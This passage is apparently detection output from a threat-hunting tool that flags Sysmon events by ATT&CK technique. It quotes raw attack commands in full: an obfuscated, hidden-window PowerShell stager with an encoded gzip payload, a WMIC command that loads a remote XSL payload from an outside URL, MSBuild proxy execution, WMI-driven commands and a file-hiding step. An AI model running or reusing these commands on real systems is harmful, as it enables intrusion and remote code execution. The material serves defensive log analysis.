4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564436038.286383,2019-07-30T01:33:58.286383+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ),1," 1 5 4 1 0 0x8000000000000000 4945 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:58.245 747F3D96-6646-5D3F-0000-0010E32E8B00 5084 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1556656012.106089,2019-05-01T00:26:52.106089+04:00,,Threat,Low,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" )",1," 1 5 4 1 0 0x8000000000000000 9807 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-04-30 20:26:51.949 365ABB72-AF8B-5CC8-0000-00101C1A1900 3348 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-2586-5CC9-0000-0020E7030000 0x3e7 0 System SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-2586-5CC9-0000-0010DC530000 460 C:\Windows\System32\services.exe C:\Windows\system32\services.exe ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1086] PowerShell Process found,1594332063.89924,2020-07-10T02:01:03.899240+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" ),1," 1 5 4 1 0 0x8000000000000000 311373 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-07-09 22:01:03.894 747F3D96-939F-5F07-0000-0010888E4600 7456 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10.0.17763.1 (WinBuild.160101.0800) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation PowerShell.EXE "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" C:\Users\IEUser\ MSEDGEWIN10\IEUser 747F3D96-86FA-5F07-0000-00204A8B0600 0x68b4a 2 Medium SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F 747F3D96-86FC-5F07-0000-00101E4B0700 2356 C:\Windows\explorer.exe C:\Windows\Explorer.EXE ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1564436034.630548,2019-07-30T01:33:54.630548+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" ),1," 1 5 4 1 0 0x8000000000000000 4941 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:54.044 747F3D96-6642-5D3F-0000-0010F69D8A00 4896 C:\Windows\System32\wbem\WMIC.exe 10.0.17763.1 (WinBuild.160101.0800) WMI Commandline Utility Microsoft® Windows® Operating System Microsoft Corporation wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E 747F3D96-6641-5D3F-0000-0010A38C8A00 4260 C:\Windows\System32\cmd.exe cmd /c wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1138] Application Shimming - process,1553028567.80776,2019-03-20T00:49:27.807760+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," 1 5 4 1 0 0x8000000000000000 1966388 Microsoft-Windows-Sysmon/Operational PC01.example.corp 2019-03-19 20:49:27.697 365ABB72-55D7-5C91-0000-001067BD0700 2236 C:\Windows\System32\sdbinst.exe 6.0.7600.16385 (win7_rtm.090713-1255) Application Compatibility Database Installer Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\sdbinst.exe" -q "C:\Windows\AppPatch\Test.SDB " C:\Windows\System32\ EXAMPLE\user01 365ABB72-5417-5C91-0000-002035340300 0x33435 1 High MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F 365ABB72-551C-5C91-0000-001030590500 2704 C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" ",PC01.example.corp,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1602975185.625304,2020-10-18T02:53:05.625304+04:00,,Threat,Low,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1," 1 5 4 1 0 0x8000000000000000 421218 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-17 22:53:05.428 747F3D96-75D1-5F8B-0000-00109EB23300 2628 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 C:\ MSEDGEWIN10\Administrator 747F3D96-75D0-5F8B-0000-0020A8A83300 0x33a8a8 0 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-75D1-5F8B-0000-00101DAB3300 2228 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1602975185.625304,2020-10-18T02:53:05.625304+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1," 1 5 4 1 0 0x8000000000000000 421218 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-17 22:53:05.428 747F3D96-75D1-5F8B-0000-00109EB23300 2628 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 C:\ MSEDGEWIN10\Administrator 747F3D96-75D0-5F8B-0000-0020A8A83300 0x33a8a8 0 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-75D1-5F8B-0000-00101DAB3300 2228 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1602975185.625304,2020-10-18T02:53:05.625304+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1," 1 5 4 1 0 0x8000000000000000 421218 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-17 22:53:05.428 747F3D96-75D1-5F8B-0000-00109EB23300 2628 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 C:\ MSEDGEWIN10\Administrator 747F3D96-75D0-5F8B-0000-0020A8A83300 0x33a8a8 0 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-75D1-5F8B-0000-00101DAB3300 2228 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564436033.843592,2019-07-30T01:33:53.843592+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" ),1," 1 5 4 1 0 0x8000000000000000 4939 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:53.759 747F3D96-6641-5D3F-0000-0010A38C8A00 4260 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1564436033.843592,2019-07-30T01:33:53.843592+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" ),1," 1 5 4 1 0 0x8000000000000000 4939 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:53.759 747F3D96-6641-5D3F-0000-0010A38C8A00 4260 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1594332045.590448,2020-07-10T02:00:45.590448+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 311365 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-07-09 22:00:45.576 747F3D96-938D-5F07-0000-001043A84500 7976 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe "C:\Windows\system32\cmd.exe" C:\Users\IEUser\ MSEDGEWIN10\IEUser 747F3D96-86FA-5F07-0000-00204A8B0600 0x68b4a 2 Medium SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-86FC-5F07-0000-00101E4B0700 2356 C:\Windows\explorer.exe C:\Windows\Explorer.EXE ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564436029.889688,2019-07-30T01:33:49.889688+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj ),1," 1 5 4 1 0 0x8000000000000000 4936 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:49.535 747F3D96-663D-5D3F-0000-00106F608A00 3240 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1138] Application Shimming - process,1553028513.920273,2019-03-20T00:48:33.920273+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," 1 5 4 1 0 0x8000000000000000 1966382 Microsoft-Windows-Sysmon/Operational PC01.example.corp 2019-03-19 20:48:33.639 365ABB72-55A1-5C91-0000-0010D6960700 2368 C:\Windows\System32\sdbinst.exe 6.0.7600.16385 (win7_rtm.090713-1255) Application Compatibility Database Installer Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\sdbinst.exe" -q -u "C:\Windows\AppPatch\Test.SDB " C:\Windows\System32\ EXAMPLE\user01 365ABB72-5417-5C91-0000-002035340300 0x33435 1 High MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F 365ABB72-551C-5C91-0000-001030590500 2704 C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" ",PC01.example.corp,Microsoft-Windows-Sysmon/Operational [T1158] Hidden Files and Directories,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (insecurebank\Administrator) running image ( C:\Windows\System32\attrib.exe ) through command line ( attrib +h nbtscan.exe ) accessing hidden files and directories,1," 1 5 4 1 0 0x8000000000000000 22013 Microsoft-Windows-Sysmon/Operational DC1.insecurebank.local technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories 2019-05-19 17:32:00.478 DFAE8213-9310-5CE1-0000-0010EABA0A00 2728 C:\Windows\System32\attrib.exe 6.3.9600.16384 (winblue_rtm.130821-1623) Attribute Utility Microsoft® Windows® Operating System Microsoft Corporation attrib +h nbtscan.exe c:\ProgramData\ insecurebank\Administrator DFAE8213-9133-5CE1-0000-0020CC660500 0x566cc 2 High 